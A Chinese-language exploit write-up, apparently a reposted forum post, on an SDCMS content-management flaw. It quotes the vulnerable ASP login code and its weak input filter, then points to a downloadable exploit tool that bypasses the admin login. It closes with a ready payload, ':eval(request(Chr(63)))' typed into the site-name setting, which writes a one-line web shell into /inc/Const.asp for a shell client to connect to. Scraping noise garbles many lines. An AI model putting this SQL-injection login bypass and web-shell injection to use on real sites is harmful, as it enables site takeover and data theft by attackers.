SDCMS通杀漏洞利用工具及提权拿SHELL

admin

作者：T00LS 鬼哥
漏洞文件：后台目录/index.asp
- o0 t" w; [, H' I, [3 z' g
$ k" p' Q, ^4 |" X$ V' J; ~Sub Check
4 `# B, Y7 V7 W; @; P    Dim username,password,code,getcode,Rs
3 R# b* }- M2 H% L) w    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    username=FilterText(Trim(Request.Form("username")),1)
& `2 o2 @0 c+ m$ [$ V1 {    password=FilterText(Trim(Request.Form("password")),1)
4 I% I! G! A, J    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
: X# c& E8 @, W+ V% D+ F6 }8 B    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空！","javascript:history.go(-1)"ied
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字！","javascript:history.go(-1)"ied
2 Z; F1 I7 X* F8 ]    IF code<>getcode Then Alert "验证码错误！","javascript:history.go(-1)"ied
    IF username="" or password="" Then
$ e9 m. J0 ?* g, a        Echo "用户名或密码不能为空"ied
    Else
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
& y7 Q2 J: O( m            Add_Cookies "sdcms_id",Rs(0)
' q7 ^7 e; a) M! Y( E, M! d, Y            Add_Cookies "sdcms_name",username
" M, b* M9 D) d& v' m' a, k            Add_Cookies "sdcms_pwd",Rs(2)
9 L; X! x8 k- a( u) B            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
* F9 Z; E6 R; ]: C* N: C            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
# f6 [. d7 ~- Q" M: |            AddLog username,GetIp,"登录成功",1
; P( F4 d# b  I- X            '自动删除30天前的Log记录
  h- o& K; h4 A$ `( J$ \: @            IF Sdcms_DataType Then
  e0 d' [- _( t. M" F1 d- H                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
- n8 O9 w/ T) K+ ^8 A            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
4 j( g( _6 m& p1 y4 y* ~% ]            End IF
            Go("sdcms_index.asp")
        End IF
6 d- i1 @6 ]: `8 F/ W. V4 Y: D" t3 s1 E        Rs.Close
        Set Rs=Nothing
! [/ L  |& i7 ?7 \+ {3 M0 |    End IF
% [" ]. W9 F' b+ a8 mEnd Sub
, G/ m& L, [1 ?" P
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码

Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
# _. p$ n2 s" _" q    t0=Trim(t0)
    Select Case t1
        Case "1"
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
' D& D; a; M. k- D# Z$ m        Case "2"
: \' O3 S! l. z: P2 `* M            t0=Replace(t0,Chr(8),"")'回格
7 V; k3 i5 F+ D: H            t0=Replace(t0,Chr(9),"")'tab(水平制表符)
" \/ c2 r' d) p/ G8 u* j; q            t0=Replace(t0,Chr(10),"")'换行
6 E, }/ h* l5 o            t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
/ _6 I- b8 C9 t3 n            t0=Replace(t0,Chr(12),"")'换页
, |8 D( y2 D6 [" Y            t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
) X" F; A* t5 _. y! j            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")'空格 SPACE
! k5 t; }) B; q9 p! |: l8 }            t0=Replace(t0,Chr(33),"")'!
0 Z$ u9 m' ]( r- ~            t0=Replace(t0,Chr(34),"")'"
- Z2 u: T% C$ }2 a            t0=Replace(t0,Chr(35),"")'#
2 l( T2 b4 D% l: z# a            t0=Replace(t0,Chr(36),"")'$
4 y9 N1 t: s0 X, g# h; S            t0=Replace(t0,Chr(37),"")'%
8 R  o3 V! ~/ o  m* I0 K            t0=Replace(t0,Chr(38),"")'&
            t0=Replace(t0,Chr(39),"")''
2 A9 P, p* J8 R6 Z% O& e9 }0 \            t0=Replace(t0,Chr(40),"")'(
$ K) d" S# U4 ?; W& [            t0=Replace(t0,Chr(41),"")')
            t0=Replace(t0,Chr(42),"")'*
. z2 A. a% D" ?% n3 v            t0=Replace(t0,Chr(43),"")'+
( \. D2 V9 ]4 E- O. I4 X& M% h2 c            t0=Replace(t0,Chr(44),"")',
( b  f8 {- |% s2 G" n* Y            t0=Replace(t0,Chr(45),"")'-
            t0=Replace(t0,Chr(46),"")'.
            t0=Replace(t0,Chr(47),"")'/
  l0 l' V; S& L            t0=Replace(t0,Chr(58),"")':
. }5 @! Q8 T9 y. }  @            t0=Replace(t0,Chr(59),"")';
6 K4 e* H7 D# q$ ]* H            t0=Replace(t0,Chr(60),"")'<             t0=Replace(t0,Chr(61),"")'=             t0=Replace(t0,Chr(62),"")'>
' d4 q& C- Y2 N4 _/ |            t0=Replace(t0,Chr(63),"")'?
) v% k3 W2 b' N% ~* Z            t0=Replace(t0,Chr(64),"")'@
            t0=Replace(t0,Chr(91),"")'\
            t0=Replace(t0,Chr(92),"")'\
1 |2 u: u, @8 ]% Y            t0=Replace(t0,Chr(93),"")']
+ [5 h- D+ X5 u. ]& X7 n            t0=Replace(t0,Chr(94),"")'^
            t0=Replace(t0,Chr(95),"")'_
            t0=Replace(t0,Chr(96),"")'`
            t0=Replace(t0,Chr(123),"")'{
            t0=Replace(t0,Chr(124),"")'|
5 Z, x5 D3 C' P+ r            t0=Replace(t0,Chr(125),"")'}
            t0=Replace(t0,Chr(126),"")'~
, [& m, k* U; J: _1 e2 y* f, A    Case Else
        t0=Replace(t0, "&", "&")
        t0=Replace(t0, "'", "'")
5 e" W* k- D6 i        t0=Replace(t0, """", """)
# c8 p& u% J2 e& O5 @' ^        t0=Replace(t0, "<", "<")         t0=Replace(t0, ">", ">")
    End Select
! ]6 j" R. s1 C; }# m: R$ l    IF Instr(Lcase(t0),"expression")>0 Then
$ X- u. P6 y( j9 I' g' n1 f        t0=Replace(t0,"expression","e&shy;xpression", 1, -1, 0)
    End If
9 g* H( `! a, `% o" \8 W) I& e) v    FilterText=t0
End Function
$ G  l3 `% n% |) @& N/ v9 F
看到没。直接参数是1 只过滤
                        t0=Replace(t0,Chr(32)," ")
& V# l' H2 ?" a4 ^                        t0=Replace(t0,Chr(13),"")
                        t0=Replace(t0,Chr(10)&Chr(10),"
")
+ z. S0 i; S! i$ d1 e5 a                        t0=Replace(t0,Chr(10),"
: ^! i; P2 h% U" Z' W! y& p2 K")
! l* M' U: `1 L/ ]4 @. k# q& ]漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
. _7 E$ J, ]# o- SEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP

! W! v9 I8 T* d& p1 n0 O测试:
( U4 k9 }1 B) @8 n+ M5 X

. V) n  b; i" D& `+ Z现在输入工具上验证码,然后点OK


, N. I. b* G8 G! u6 V看到我们直接进入后台管理界面了,呵呵!

/ A: ~! \9 N$ H

这样直接进入后台了。。。。

9 Z3 b" C& C3 u7 d0 `
/ l6 q& F1 o7 N- T. T$ F: h" u8 q
4 H( v+ q' E) t2 ZSDCMS提权:
# ^9 _( {. z+ ?6 c
方法1：访问：/后台目录/sdcms_set.asp 在 网站名称：后面加个 “:eval(request(Chr(63)))’  即可，直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
' j% m+ `) X/ ~* v
# |$ @8 `% B# h! W' l& o+ x
$ I# [! \. n' A
OK,现在用菜刀连接下!
0 F  Q/ F6 _3 Y+ U% P/ G
- u& H+ K' [1 f$ Z



* K/ V% w- f3 Z; G